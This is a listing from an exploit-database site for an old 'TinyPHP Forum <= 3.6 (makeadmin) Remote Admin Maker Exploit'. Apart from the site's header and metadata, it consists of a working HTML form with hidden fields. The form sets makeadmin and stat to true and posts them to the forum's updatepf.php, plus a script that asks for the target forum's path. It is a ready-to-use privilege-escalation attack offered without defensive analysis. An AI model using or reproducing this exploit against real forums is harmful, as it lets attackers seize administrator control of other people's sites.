[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

TinyPHP Forum <= 3.6 (makeadmin) Remote Admin Maker Exploit

Author
SirDarckCat
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-636
Category
web applications
Date add
01-08-2006
Platform
unsorted
===========================================================
TinyPHP Forum <= 3.6 (makeadmin) Remote Admin Maker Exploit
===========================================================



TinyPHPForum 3.6 Admin Maker<br>
By SirDarckCat from elhacker.net

<FORM method=post enctype="multipart/form-data">
Existing User:<INPUT name=uname><br>
<INPUT type=file name=userfile style="visibility:HIDDEN"><br>
<INPUT type=hidden name=email value="a@b.c">
<input type=hidden name=makeadmin value=true>
<input type=hidden name=stat value=true>
<input type=hidden name=ulang value=en>
<input type=hidden name=uskin value=default>
<INPUT type=submit>
</FORM>

<script language="JavaScript">
document.forms[0].action=prompt("Path to forum","http://www.server.com/tpf/")+"updatepf.php";
</script>



#  0day.today [2024-12-25]  #